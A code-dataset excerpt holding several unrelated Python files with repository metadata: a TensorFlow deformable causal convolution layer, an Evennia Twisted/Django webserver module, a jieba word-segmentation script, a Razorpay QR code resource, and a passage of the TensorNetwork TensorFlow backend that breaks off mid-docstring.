'allreduce_grads', 'DistOptimizerHook', 'tensor2imgs', 'unmap',
'multi_apply', 'enumerate_by_image'
]
| 32.375
| 70
| 0.752896
|
067d5bedca44f4f2ca349eed27fd501fa3fda654
| 8,652
|
py
|
Python
|
layers/ddcconv1d.py
|
bshishov/DeepForecasting
|
a562ed5fa39c097f8dd4f41ae65b52bf887f8f33
|
[
"MIT"
] | 4
|
2018-12-06T08:55:20.000Z
|
2020-04-11T20:30:38.000Z
|
layers/ddcconv1d.py
|
bshishov/DeepForecasting
|
a562ed5fa39c097f8dd4f41ae65b52bf887f8f33
|
[
"MIT"
] | null | null | null |
layers/ddcconv1d.py
|
bshishov/DeepForecasting
|
a562ed5fa39c097f8dd4f41ae65b52bf887f8f33
|
[
"MIT"
] | 2
|
2020-04-09T14:43:37.000Z
|
2020-08-04T22:34:13.000Z
|
import tensorflow as tf
import numpy as np
def get_shape(spec: str, spec_shape: dict):
return tuple(spec_shape[dim] for dim in spec)
def expand_transform(x, input_spec: str, output_spec: str, output_spec_shape: dict, numpy=False):
assert len(output_spec) == len(output_spec_shape)
if numpy:
tile_op = np.tile
reshape_op = np.reshape
transpose_op = np.transpose
else:
tile_op = tf.tile
reshape_op = tf.reshape
transpose_op = tf.transpose
input_spec = [dim for dim in input_spec]
output_spec = [dim for dim in output_spec]
missing_dims = [dim for dim in output_spec if dim not in input_spec]
missing_shapes = [output_spec_shape[dim] for dim in missing_dims]
missing_size = np.prod(missing_shapes)
tmp_spec = missing_dims + input_spec
transpose = [tmp_spec.index(dim) for dim in output_spec]
if len(missing_dims) > 0:
# Tile and reshape, missing dims will be first
x = tile_op(x, [missing_size] + [1] * (len(input_spec) - 1))
x = reshape_op(x, missing_shapes + [output_spec_shape[dim] for dim in input_spec])
if tmp_spec != output_spec:
x = transpose_op(x, transpose)
return x
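# Worked example (illustrative): with spec_shape = {'B': 2, 'S': 3, 'K': 4}, calling
# expand_transform(x, 'SK', 'BSK', spec_shape) takes an (S, K) = (3, 4) tensor, tiles it
# twice along a new leading axis and reshapes it to (B, S, K) = (2, 3, 4); dimensions that
# appear in the output spec but not in the input spec are always filled in by tiling.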
def get_coords(kernel_indices, offsets, offset_mode: str, spec_shapes: dict):
"""
Returns float coordinates in (B, S, F, C, K) shape
kernel_indices in (S, K) shape
    offsets in offset_mode (any combination of dimensions)
"""
if offsets is None:
print('DDCC1D layer used without offsets')
return expand_transform(kernel_indices, 'SK', 'BSFCK', spec_shapes)
    def _coords(_kernel_indices, _offsets):
        # Clip to the valid time-index range [0, S - 1]; using _kernel_indices.get_shape()[0]
        # would give the wrong bound once the indices have been expanded (e.g. to BSK).
        return tf.clip_by_value(_kernel_indices + _offsets, 0, spec_shapes['S'] - 1)
out_spec = 'BSFCK'
kernel_spec = 'SK'
if offset_mode == kernel_spec or offset_mode == 'K':
return expand_transform(_coords(kernel_indices, offsets), kernel_spec, out_spec, spec_shapes)
if offset_mode == 'S':
offsets = expand_transform(offsets, offset_mode, kernel_spec, spec_shapes)
return expand_transform(_coords(kernel_indices, offsets), kernel_spec, out_spec, spec_shapes)
if offset_mode == 'BSK':
indices = expand_transform(kernel_indices, kernel_spec, offset_mode, spec_shapes)
return expand_transform(_coords(indices, offsets), offset_mode, out_spec, spec_shapes)
if offset_mode == 'SFK':
indices = expand_transform(kernel_indices, kernel_spec, offset_mode, spec_shapes)
return expand_transform(_coords(indices, offsets), offset_mode, out_spec, spec_shapes)
# Naive (most inefficient) method
indices = expand_transform(kernel_indices, 'SK', out_spec, spec_shapes)
offsets = expand_transform(offsets, offset_mode, out_spec, spec_shapes)
return _coords(indices, offsets)
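# Note: the 'K', 'SK', 'S', 'BSK' and 'SFK' offset modes take the specialised branches above;
# any other offset_mode falls through to the fully expanded BSFCK path, which is the most
# memory-hungry option.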
def ddcconv1d(inputs: tf.Variable,
weights: tf.Variable,
offsets: tf.Variable,
dilation_rate: int = 1,
offset_mode='F',
interpolate=True,
name: str='ddcc1d'):
"""
Deformable Dilated Causal Convolution 1D
Shape dimensions notation:
B - batch size
S - sequence len
C - input channels
K - kernel size
F - filters
:param name: name of the layer
:param inputs: Input tensor of shape (B, S, C)
:param weights: Tensor of shape (F, C, K)
    :param offsets: Tensor of shape (F)
:param dilation_rate: Size of receptive field gap
:param offset_mode: offset mode any combination of dimensions, like
F - one offset per filter,
FK - offset per filter and each kernel weight
BSC - offset per every timestep of each sample
:param interpolate: Use linear interpolation or just convert indices to int32
:return: Computed 1D convolutions of shape (B, S, F)
"""
with tf.variable_scope(name):
batch_size, seq_length, channels = (int(v) for v in inputs.shape)
filters, _, kernel_size = (int(v) for v in weights.shape)
spec_shapes = {
'B': batch_size,
'S': seq_length,
'F': filters,
'C': channels,
'K': kernel_size
}
# Indices stuff
with tf.variable_scope('KernelBaseIndices'):
base_indices = np.arange(seq_length).repeat(kernel_size).reshape((-1, kernel_size))
window_indices = tf.constant(base_indices, dtype=tf.float32, name='window_indices')
receptive_field = tf.constant(np.linspace(-kernel_size + 1, 0, kernel_size) * dilation_rate,
name='receptive_field',
dtype=tf.float32)
kernel_indices = window_indices + receptive_field
with tf.variable_scope('BatchIndices'):
# Create batch indices constant in BSFCK shape
batch_indices_np = expand_transform(np.arange(batch_size, dtype=np.int32), 'B', 'BSFCK', spec_shapes, numpy=True)
batch_indices = tf.constant(batch_indices_np, dtype=tf.int32, name='batch_indices')
with tf.variable_scope('ChannelIndices'):
# Create channel indices constant in BSFCK shape
channel_indices_np = expand_transform(np.arange(channels, dtype=np.int32), 'C', 'BSFCK', spec_shapes, numpy=True)
channel_indices = tf.constant(channel_indices_np, dtype=tf.int32, name='channel_indices')
with tf.variable_scope('Sampling'):
# SAMPLING IS EXTREMELY EXPENSIVE!!!!!
coords = get_coords(kernel_indices, offsets, offset_mode=offset_mode, spec_shapes=spec_shapes)
if interpolate:
# Left and right indices, e.g. index of 3.65 would be 3 on the left and 4 on the right
indices_left = tf.cast(tf.floor(coords), tf.int32)
indices_right = tf.cast(tf.ceil(coords), tf.int32)
# Calculate interpolation, for index 3.65 interpolation factor would be 0.65
interpolation = coords - tf.cast(indices_left, tf.float32)
# Sample both values (on the lef and right)
# Sample input of shape BSC with BSFCK3 indices (produced by stack) -> BSFCK for each side (left and right)
vals_left = tf.gather_nd(inputs, tf.stack((batch_indices, indices_left, channel_indices), axis=-1))
vals_right = tf.gather_nd(inputs, tf.stack((batch_indices, indices_right, channel_indices), axis=-1))
# Interpolated values
samples = vals_left + (vals_right - vals_left) * interpolation
else:
batch_idx = tf.stack((batch_indices, tf.cast(tf.floor(coords), tf.int32), channel_indices), axis=-1)
samples = tf.gather_nd(inputs, batch_idx)
with tf.variable_scope('Convolution'):
# Apply weights: BSFCK * FCK = BSFCK
conv = samples * weights
# Sum across kernel: BSFCK -> BSFC
conv = tf.reduce_sum(conv, axis=-1)
# Sum across channels: BSFC -> BSF
conv = tf.reduce_sum(conv, axis=-1)
return conv
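# Shape flow summary for ddcconv1d (for reference): the (B, S, C) inputs are sampled at the
# deformed kernel positions to give samples of shape (B, S, F, C, K); multiplying by the
# (F, C, K) weights and reducing over K and then C yields the (B, S, F) output returned above.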
def _transform_test():
x = np.arange(10)
spec_shape = {'B': len(x), 'T': 3, 'C': 2}
outputs = ['BTC', 'BCT', 'TBC', 'TCB', 'CBT', 'CTB']
for output_spec in outputs:
print(output_spec)
print(expand_transform(x, 'B', output_spec, spec_shape, numpy=True))
print('\n\n')
def _conv_test():
def print_var(v):
print("{0}: {1}:\n\t{2}".format(v.name, v.shape, v.eval()))
# shape: (batch_size, sequence_len, channels)
x_raw = np.array([
[[0, 0], [1, 1], [2, 2], [3, 3], [4, 4]],
[[1, 1], [2, 2], [3, 3], [4, 4], [5, 5]],
[[2, 2], [3, 3], [4, 4], [5, 5], [6, 6]],
])
# Filters: FCK shape
filter_weights_raw = np.array([
[[1], [0]]
])
# Filter offsets: F shape
filter_offsets_raw = np.ones(filter_weights_raw.shape[0]) * 0.5
x = tf.Variable(x_raw, name='x', dtype=tf.float32, trainable=False)
filter_weights = tf.Variable(filter_weights_raw, name='filter_weights', dtype=tf.float32)
filter_offsets = tf.Variable(filter_offsets_raw, name='filter_offsets', dtype=tf.float32)
y = ddcconv1d(x, weights=filter_weights, offsets=filter_offsets, offset_mode='F')
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print_var(x)
print_var(filter_offsets)
print_var(filter_weights)
print_var(y)
def main():
#_transform_test()
_conv_test()
if __name__ == '__main__':
main()
| 39.506849
| 125
| 0.633264
|
defde838be23a116f4b1b8302697347554ee7744
| 4,115
|
py
|
Python
|
src/server/webserver.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | 5
|
2015-01-30T08:47:59.000Z
|
2022-01-22T19:27:03.000Z
|
src/server/webserver.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | 2
|
2017-12-28T21:36:48.000Z
|
2017-12-28T21:36:57.000Z
|
src/server/webserver.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | 1
|
2019-01-05T15:51:37.000Z
|
2019-01-05T15:51:37.000Z
|
"""
This implements resources for twisted webservers using the wsgi
interface of django. This alleviates the need of running e.g. an
apache server to serve Evennia's web presence (although you could do
that too if desired).
The actual servers are started inside server.py as part of the Evennia
application.
(Lots of thanks to http://githup.com/clemensha/twisted-wsgi-django for
a great example/aid on how to do this.)
"""
import urlparse
from urllib import quote as urlquote
from twisted.web import resource, http
from twisted.internet import reactor
from twisted.application import internet
from twisted.web.proxy import ReverseProxyResource
from twisted.web.server import NOT_DONE_YET
from twisted.web.wsgi import WSGIResource
from django.core.handlers.wsgi import WSGIHandler
from settings import UPSTREAM_IPS
#
# X-Forwarded-For Handler
#
class HTTPChannelWithXForwardedFor(http.HTTPChannel):
def allHeadersReceived(self):
"""
Check to see if this is a reverse proxied connection.
"""
CLIENT = 0
http.HTTPChannel.allHeadersReceived(self)
req = self.requests[-1]
client_ip, port = self.transport.client
proxy_chain = req.getHeader('X-FORWARDED-FOR')
if proxy_chain and client_ip in UPSTREAM_IPS:
forwarded = proxy_chain.split(', ', 1)[CLIENT]
self.transport.client = (forwarded, port)
# Monkey-patch Twisted to handle X-Forwarded-For.
http.HTTPFactory.protocol = HTTPChannelWithXForwardedFor
class EvenniaReverseProxyResource(ReverseProxyResource):
def getChild(self, path, request):
"""
Create and return a proxy resource with the same proxy configuration
as this one, except that its path also contains the segment given by
C{path} at the end.
"""
return EvenniaReverseProxyResource(
self.host, self.port, self.path + '/' + urlquote(path, safe=""),
self.reactor)
def render(self, request):
"""
Render a request by forwarding it to the proxied server.
"""
# RFC 2616 tells us that we can omit the port if it's the default port,
# but we have to provide it otherwise
request.content.seek(0, 0)
qs = urlparse.urlparse(request.uri)[4]
if qs:
rest = self.path + '?' + qs
else:
rest = self.path
clientFactory = self.proxyClientFactoryClass(
request.method, rest, request.clientproto,
request.getAllHeaders(), request.content.read(), request)
self.reactor.connectTCP(self.host, self.port, clientFactory)
return NOT_DONE_YET
#
# Website server resource
#
class DjangoWebRoot(resource.Resource):
"""
This creates a web root (/) that Django
understands by tweaking the way the
    child instances are recognized.
"""
def __init__(self, pool):
"""
Setup the django+twisted resource
"""
resource.Resource.__init__(self)
self.wsgi_resource = WSGIResource(reactor, pool, WSGIHandler())
def getChild(self, path, request):
"""
To make things work we nudge the
url tree to make this the root.
"""
path0 = request.prepath.pop(0)
request.postpath.insert(0, path0)
return self.wsgi_resource
#
# Threaded Webserver
#
class WSGIWebServer(internet.TCPServer):
"""
This is a WSGI webserver. It makes sure to start
the threadpool after the service itself started,
so as to register correctly with the twisted daemon.
call with WSGIWebServer(threadpool, port, wsgi_resource)
"""
def __init__(self, pool, *args, **kwargs):
"This just stores the threadpool"
self.pool = pool
internet.TCPServer.__init__(self, *args, **kwargs)
def startService(self):
"Start the pool after the service"
internet.TCPServer.startService(self)
self.pool.start()
def stopService(self):
"Safely stop the pool after service stop."
internet.TCPServer.stopService(self)
self.pool.stop()
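# Illustrative wiring of the pieces above (a sketch; the port number and the service parent
# are assumptions, not taken from this file):
#
#   from twisted.python.threadpool import ThreadPool
#   from twisted.web import server
#
#   pool = ThreadPool()
#   root = DjangoWebRoot(pool)
#   site = server.Site(root)
#   web_service = WSGIWebServer(pool, 8000, site)
#   web_service.setServiceParent(application)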
| 30.481481
| 79
| 0.672175
|
6c865e0def5bd37609acc97b0f4a3dded8b9e0b1
| 4,736
|
py
|
Python
|
data/jd/segment_word.py
|
zhangxiangxiao/Glyph
|
df6ef326215657a2f76c4c6fb469ff85760a9afa
|
[
"BSD-3-Clause"
] | 165
|
2017-09-01T07:54:04.000Z
|
2022-03-28T18:59:03.000Z
|
data/jd/segment_word.py
|
zhangxiangxiao/Glyph
|
df6ef326215657a2f76c4c6fb469ff85760a9afa
|
[
"BSD-3-Clause"
] | 3
|
2019-04-27T10:25:51.000Z
|
2019-05-13T13:49:17.000Z
|
data/jd/segment_word.py
|
zhangxiangxiao/Glyph
|
df6ef326215657a2f76c4c6fb469ff85760a9afa
|
[
"BSD-3-Clause"
] | 38
|
2017-12-28T01:09:54.000Z
|
2021-09-09T08:10:04.000Z
|
#!/usr/bin/python3
'''
Convert Chinese datasets to Index of Words
Copyright 2016 Xiang Zhang
Usage: python3 segment_word.py -i [input] -l [list] -o [output] [-r]
'''
#Input file
INPUT = '../data/dianping/train.csv'
#Output file
OUTPUT = '../data/dianping/train_word.csv'
# List file
LIST = '../data/dianping/train_word_list.csv'
# Read already defined word list
READ = False
import argparse
import csv
import jieba
# Main program
def main():
global INPUT
global OUTPUT
global LIST
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', help = 'Input file', default = INPUT)
parser.add_argument(
'-o', '--output', help = 'Output file', default = OUTPUT)
parser.add_argument('-l', '--list', help = 'Word list file', default = LIST)
parser.add_argument(
'-r', '--read', help = 'Read from list file', action = 'store_true')
args = parser.parse_args()
INPUT = args.input
OUTPUT = args.output
LIST = args.list
READ = args.read
if READ:
print('Reading word index')
word_index = readWords()
else:
print('Counting words')
word_count, word_freq = segmentWords()
print('Sorting words by count')
word_index = sortWords(word_count, word_freq)
print('Constructing word index output')
convertWords(word_index)
# Read from pre-existing word list
def readWords():
# Open the files
ifd = open(LIST, encoding = 'utf-8', newline = '')
reader = csv.reader(ifd, quoting = csv.QUOTE_ALL)
# Loop over the csv rows
word_index = dict()
n = 0
for row in reader:
word = row[0].replace('\\n', '\n')
word_index[word] = n + 1
n = n + 1
if n % 1000 == 0:
print('\rProcessing line: {}'.format(n), end = '')
print('\rProcessed lines: {}'.format(n))
return word_index
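# Example (illustrative): a list file containing the rows
#   "the","1023","0.51"
#   "of","871","0.43"
# yields word_index == {'the': 1, 'of': 2}; indices start at 1, and words missing from the
# list are later mapped to len(word_index) + 1 by convertWords().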
# Segment the text in Chinese
def segmentWords():
# Open the files
ifd = open(INPUT, encoding = 'utf-8', newline = '')
reader = csv.reader(ifd, quoting = csv.QUOTE_ALL)
# Loop over the csv rows
word_count = dict()
word_freq = dict()
n = 0
for row in reader:
field_set = set()
for i in range(1, len(row)):
field = row[i].replace('\\n', '\n')
field_list = jieba.cut(field)
for word in field_list:
word_count[word] = word_count.get(word, 0) + 1
if word not in field_set:
field_set.add(word)
word_freq[word] = word_freq.get(word, 0) + 1
n = n + 1
if n % 1000 == 0:
print('\rProcessing line: {}'.format(n), end = '')
print('\rProcessed lines: {}'.format(n))
ifd.close()
# Normalizing word frequency
for word in word_freq:
word_freq[word] = float(word_freq[word]) / float(n)
return word_count, word_freq
# Sort words for a given count dictionary object
def sortWords(word_count, word_freq):
# Sort the words
word_list = sorted(
word_count, key = lambda word: word_count[word], reverse = True)
# Open the files
ofd = open(LIST, 'w', encoding = 'utf-8', newline = '')
writer = csv.writer(ofd, quoting = csv.QUOTE_ALL, lineterminator = '\n')
# Loop over all the words
word_index = dict()
n = 0
for i in range(len(word_list)):
word = word_list[i]
row = [word.replace('\n', '\\n'), str(word_count[word]),
str(word_freq[word])]
writer.writerow(row)
word_index[word] = i + 1
n = n + 1
if n % 1000 == 0:
print('\rProcessing word: {}'.format(n), end = '')
print('\rProcessed words: {}'.format(n))
ofd.close()
return word_index
# Convert the text in Chinese to word list
def convertWords(word_index):
# Open the files
ifd = open(INPUT, encoding = 'utf-8', newline = '')
ofd = open(OUTPUT, 'w', encoding = 'utf-8', newline = '')
reader = csv.reader(ifd, quoting = csv.QUOTE_ALL)
writer = csv.writer(ofd, quoting = csv.QUOTE_ALL, lineterminator = '\n')
# Loop over the csv rows
n = 0
for row in reader:
new_row = list()
new_row.append(row[0])
for i in range(1, len(row)):
field = row[i].replace('\\n', '\n')
field_list = jieba.cut(field)
new_row.append(' '.join(map(
str, map(lambda word: word_index.get(word, len(word_index) + 1),
field_list))))
writer.writerow(new_row)
n = n + 1
if n % 1000 == 0:
print('\rProcessing line: {}'.format(n), end = '')
print('\rProcessed lines: {}'.format(n))
ifd.close()
ofd.close()
if __name__ == '__main__':
main()
| 30.954248
| 80
| 0.580025
|
71150cf4c906c9fc1dc521163905b34298258d5b
| 1,503
|
py
|
Python
|
razorpay/resources/qrcode.py
|
captn3m0/razorpay
|
0352f2d81696984c96e51c55a81178c663be320f
|
[
"MIT"
] | 3
|
2015-11-18T10:28:07.000Z
|
2015-11-21T01:17:35.000Z
|
razorpay/resources/qrcode.py
|
captn3m0/razorpay
|
0352f2d81696984c96e51c55a81178c663be320f
|
[
"MIT"
] | null | null | null |
razorpay/resources/qrcode.py
|
captn3m0/razorpay
|
0352f2d81696984c96e51c55a81178c663be320f
|
[
"MIT"
] | null | null | null |
from .base import Resource
from ..constants.url import URL
class Qrcode(Resource):
def __init__(self, client=None):
super(Qrcode, self).__init__(client)
self.base_url = URL.QRCODE_URL
    def fetch(self, qrcode_id, data={}, **kwargs):
        """
        Fetch a QR code
        Args:
            qrcode_id : Id of the QR code to be retrieved
        Returns:
            Qrcode dict for given qrcode id
        """
return super(Qrcode, self).fetch(qrcode_id, data, **kwargs)
    def create(self, data={}, **kwargs):
        """
Create a QR Code
Returns:
QrCode Dict which was created
"""
url = self.base_url
return self.post_url(url, data, **kwargs)
    def all(self, data={}, **kwargs):
        """
        Fetch all QR codes
Returns:
Qrcode dict
"""
return super(Qrcode, self).all(data, **kwargs)
    def fetch_all_payments(self, qrcode_id, data={}, **kwargs):
        """
Fetch Payments for a QR Code
Returns:
Qrcode payment dict
"""
url = "{}/{}/payments".format(self.base_url, qrcode_id)
return self.get_url(url, data, **kwargs)
    def close(self, qrcode_id, **kwargs):
        """
Close a QR Code
Returns:
Qrcode Dict which was closed
"""
url = '{}/{}/close'.format(self.base_url, qrcode_id)
return self.post_url(url, {}, **kwargs)
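# Illustrative usage (a sketch; the client construction and the request fields are assumptions
# about the wider SDK and API, not defined in this file):
#
#   import razorpay
#   client = razorpay.Client(auth=("<key_id>", "<key_secret>"))
#   qr = Qrcode(client).create({"type": "upi_qr", "usage": "single_use"})
#   payments = Qrcode(client).fetch_all_payments(qr["id"])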
| 24.639344
| 74
| 0.539587
|
8b4e72a1dd06b62062ace0671bf05beef7def8a1
| 14,349
|
py
|
Python
|
tensornetwork/backends/tensorflow/tensorflow_backend.py
|
jeff-bezos-amazon/TensorNetwork
|
79337eeb4d0accf263a3bbc27e16de0d6be547df
|
[
"Apache-2.0"
] | null | null | null |
tensornetwork/backends/tensorflow/tensorflow_backend.py
|
jeff-bezos-amazon/TensorNetwork
|
79337eeb4d0accf263a3bbc27e16de0d6be547df
|
[
"Apache-2.0"
] | null | null | null |
tensornetwork/backends/tensorflow/tensorflow_backend.py
|
jeff-bezos-amazon/TensorNetwork
|
79337eeb4d0accf263a3bbc27e16de0d6be547df
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The TensorNetwork Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#pylint: disable=line-too-long
from typing import Optional, Any, Sequence, Tuple, Type, Callable, List, Text
from tensornetwork.backends import abstract_backend
from tensornetwork.backends.tensorflow import decompositions
from tensornetwork.backends.tensorflow import tensordot2
# This might seem bad, but pytype treats tf.Tensor as Any anyway, so
# we don't actually lose anything by doing this.
import numpy as np
Tensor = Any
#pylint: disable=abstract-method
class TensorFlowBackend(abstract_backend.AbstractBackend):
"""See base_backend.BaseBackend for documentation."""
def __init__(self) -> None:
# pylint: disable=global-variable-undefined
global tf
super(TensorFlowBackend, self).__init__()
try:
#pylint: disable=import-outside-toplevel
import tensorflow
except ImportError:
raise ImportError("Tensorflow not installed, please switch to a "
"different backend or install Tensorflow.")
tf = tensorflow
self.name = "tensorflow"
def tensordot(self, a: Tensor, b: Tensor,
axes: Sequence[Sequence[int]]) -> Tensor:
return tensordot2.tensordot(tf, a, b, axes)
def reshape(self, tensor: Tensor, shape: Tensor) -> Tensor:
return tf.reshape(tensor, shape)
def transpose(self, tensor, perm) -> Tensor:
return tf.transpose(tensor, perm)
def slice(self, tensor: Tensor, start_indices: Tuple[int, ...],
slice_sizes: Tuple[int, ...]) -> Tensor:
if len(start_indices) != len(slice_sizes):
      raise ValueError("Lengths of start_indices and slice_sizes must be "
"identical.")
return tf.slice(tensor, start_indices, slice_sizes)
def svd(
self,
tensor: Tensor,
pivot_axis: int = -1,
max_singular_values: Optional[int] = None,
max_truncation_error: Optional[float] = None,
relative: Optional[bool] = False
) -> Tuple[Tensor, Tensor, Tensor, Tensor]:
return decompositions.svd(
tf,
tensor,
pivot_axis,
max_singular_values,
max_truncation_error,
relative=relative)
def qr(self, tensor: Tensor, pivot_axis: int = -1,
non_negative_diagonal: bool = False) -> Tuple[Tensor, Tensor]:
return decompositions.qr(tf, tensor, pivot_axis, non_negative_diagonal)
def rq(self, tensor: Tensor, pivot_axis: int = -1,
non_negative_diagonal: bool = False) -> Tuple[Tensor, Tensor]:
return decompositions.rq(tf, tensor, pivot_axis, non_negative_diagonal)
def shape_concat(self, values: Tensor, axis: int) -> Tensor:
return tf.concat(values, axis)
def shape_tensor(self, tensor: Tensor) -> Tensor:
return tf.shape(tensor)
def shape_tuple(self, tensor: Tensor) -> Tuple[Optional[int], ...]:
return tuple(tensor.shape.as_list())
def sparse_shape(self, tensor: Tensor) -> Tuple[Optional[int], ...]:
return self.shape_tuple(tensor)
def shape_prod(self, values: Tensor) -> Tensor:
return tf.reduce_prod(values)
def sqrt(self, tensor: Tensor) -> Tensor:
return tf.sqrt(tensor)
def convert_to_tensor(self, tensor: Tensor) -> Tensor:
result = tf.convert_to_tensor(tensor)
return result
def outer_product(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
return tensordot2.tensordot(tf, tensor1, tensor2, 0)
#pylint: disable=unused-argument
def einsum(self,
expression: str,
*tensors: Tensor,
optimize: bool = True) -> Tensor:
return tf.einsum(expression, *tensors)
def norm(self, tensor: Tensor) -> Tensor:
return tf.linalg.norm(tensor)
def eye(self,
N: int,
dtype: Optional[Type[np.number]] = None,
M: Optional[int] = None) -> Tensor:
dtype = dtype if dtype is not None else tf.float64
return tf.eye(num_rows=N, num_columns=M, dtype=dtype)
def ones(self,
shape: Tuple[int, ...],
dtype: Optional[Type[np.number]] = None) -> Tensor:
dtype = dtype if dtype is not None else tf.float64
return tf.ones(shape=shape, dtype=dtype)
def zeros(self,
shape: Tuple[int, ...],
dtype: Optional[Type[np.number]] = None) -> Tensor:
dtype = dtype if dtype is not None else tf.float64
return tf.zeros(shape, dtype=dtype)
def randn(self,
shape: Tuple[int, ...],
dtype: Optional[Type[np.number]] = None,
seed: Optional[int] = None) -> Tensor:
if seed:
tf.random.set_seed(seed)
dtype = dtype if dtype is not None else tf.float64
if (dtype is tf.complex128) or (dtype is tf.complex64):
return tf.complex(
tf.random.normal(shape=shape, dtype=dtype.real_dtype),
tf.random.normal(shape=shape, dtype=dtype.real_dtype))
return tf.random.normal(shape=shape, dtype=dtype)
def random_uniform(self,
shape: Tuple[int, ...],
boundaries: Optional[Tuple[float, float]] = (0.0, 1.0),
dtype: Optional[Type[np.number]] = None,
seed: Optional[int] = None) -> Tensor:
if seed:
tf.random.set_seed(seed)
dtype = dtype if dtype is not None else tf.float64
if (dtype is tf.complex128) or (dtype is tf.complex64):
#pylint: disable=unexpected-keyword-arg
return tf.complex(
tf.random.uniform(
shape=shape,
minval=boundaries[0],
maxval=boundaries[1],
dtype=dtype.real_dtype),
tf.random.uniform(
shape=shape,
minval=boundaries[0],
maxval=boundaries[1],
dtype=dtype.real_dtype))
#pylint: disable=unexpected-keyword-arg
a = tf.random.uniform(
shape=shape, minval=boundaries[0], maxval=boundaries[1], dtype=dtype)
return a
def conj(self, tensor: Tensor) -> Tensor:
return tf.math.conj(tensor)
def eigh(self, matrix: Tensor) -> Tuple[Tensor, Tensor]:
return tf.linalg.eigh(matrix)
def addition(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
return tensor1 + tensor2
def subtraction(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
return tensor1 - tensor2
def multiply(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
return tensor1 * tensor2
def divide(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
return tensor1 / tensor2
def index_update(self, tensor: Tensor, mask: Tensor,
assignee: Tensor) -> Tensor:
#returns a copy (unfortunately)
return tf.where(mask, assignee, tensor)
def inv(self, matrix: Tensor) -> Tensor:
if len(matrix.shape) > 2:
raise ValueError("input to tensorflow backend method `inv` has shape {}. "
"Only matrices are supported.".format(tf.shape(matrix)))
return tf.linalg.inv(matrix)
def broadcast_right_multiplication(self, tensor1: Tensor,
tensor2: Tensor) -> Tensor:
if len(tensor2.shape) != 1:
raise ValueError("only order-1 tensors are allowed for `tensor2`, "
"found `tensor2.shape = {}`".format(tf.shape(tensor2)))
return tensor1 * tensor2
def broadcast_left_multiplication(self, tensor1: Tensor,
tensor2: Tensor) -> Tensor:
if len(tensor1.shape) != 1:
raise ValueError("only order-1 tensors are allowed for `tensor1`,"
" found `tensor1.shape = {}`".format(tf.shape(tensor1)))
t1_broadcast_shape = self.shape_concat(
[self.shape_tensor(tensor1), [1] * (len(tensor2.shape) - 1)], axis=-1)
return tensor2 * self.reshape(tensor1, t1_broadcast_shape)
def sin(self, tensor: Tensor) -> Tensor:
return tf.math.sin(tensor)
def cos(self, tensor: Tensor) -> Tensor:
return tf.math.cos(tensor)
def exp(self, tensor: Tensor) -> Tensor:
return tf.math.exp(tensor)
def log(self, tensor: Tensor) -> Tensor:
return tf.math.log(tensor)
def expm(self, matrix: Tensor) -> Tensor:
if len(matrix.shape) != 2:
raise ValueError("input to tensorflow backend method `expm` has shape {}."
" Only matrices are supported.".format(matrix.shape))
if matrix.shape[0] != matrix.shape[1]:
      raise ValueError("input to tensorflow backend method `expm` only supports "
"N*N matrix, {x}*{y} matrix is given".format(
x=matrix.shape[0], y=matrix.shape[1]))
return tf.linalg.expm(matrix)
def jit(self, fun: Callable, *args: List, **kwargs: dict) -> Callable:
# tf.function is slow and bad.
return fun
def sum(self,
tensor: Tensor,
axis: Optional[Sequence[int]] = None,
keepdims: bool = False) -> Tensor:
return tf.math.reduce_sum(tensor, axis=axis, keepdims=keepdims)
def matmul(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
if (tensor1.ndim <= 1) or (tensor2.ndim <= 1):
      raise ValueError("inputs to `matmul` have to be tensors of order > 1.")
return tf.matmul(tensor1, tensor2)
def diagonal(self, tensor: Tensor, offset: int = 0, axis1: int = -2,
axis2: int = -1) -> Tensor:
"""Return specified diagonals.
If tensor is 2-D, returns the diagonal of tensor with the given offset,
i.e., the collection of elements of the form a[i, i+offset].
If a has more than two dimensions, then the axes specified by
axis1 and axis2 are used to determine the 2-D sub-array whose diagonal is
returned. The shape of the resulting array can be determined by removing
axis1 and axis2 and appending an index to the right equal to the size of the
resulting diagonals.
This function only extracts diagonals. If you
wish to create diagonal matrices from vectors, use diagflat.
Args:
tensor: A tensor.
offset: Offset of the diagonal from the main diagonal.
axis1, axis2: Axis to be used as the first/second axis of the 2D
sub-arrays from which the diagonals should be taken.
Defaults to second-last and last axis (note this
differs from the NumPy defaults).
These arguments are not supported in the TensorFlow
backend and an error will be raised if they are
specified.
Returns:
array_of_diagonals: A dim = min(1, tensor.ndim - 2) tensor storing
the batched diagonals.
"""
if axis1 != -2 or axis2 != -1:
      errstr = (f"axis1={axis1}, axis2={axis2} must be -2, -1 (the defaults) "
f"with TensorFlow backend.")
raise NotImplementedError(errstr)
#pylint: disable=unexpected-keyword-arg
return tf.linalg.diag_part(tensor, k=offset)
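  # Example (for reference): for a (batch, n, n) input with the default axes,
  # tf.linalg.diag_part(tensor, k=offset) returns a (batch, n - |offset|) tensor holding
  # the batched diagonals.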
def diagflat(self, tensor: Tensor, k: int = 0) -> Tensor:
""" Flattens tensor and creates a new matrix of zeros with its elements
on the k'th diagonal.
Args:
tensor: A tensor.
k : The diagonal upon which to place its elements.
Returns:
tensor: A new tensor with all zeros save the specified diagonal.
"""
#pylint: disable=unexpected-keyword-arg
return tf.linalg.diag(tensor, k=k)
def trace(self, tensor: Tensor, offset: int = 0, axis1: int = -2,
axis2: int = -1) -> Tensor:
"""Return summed entries along diagonals.
If tensor is 2-D, the sum is over the
diagonal of tensor with the given offset,
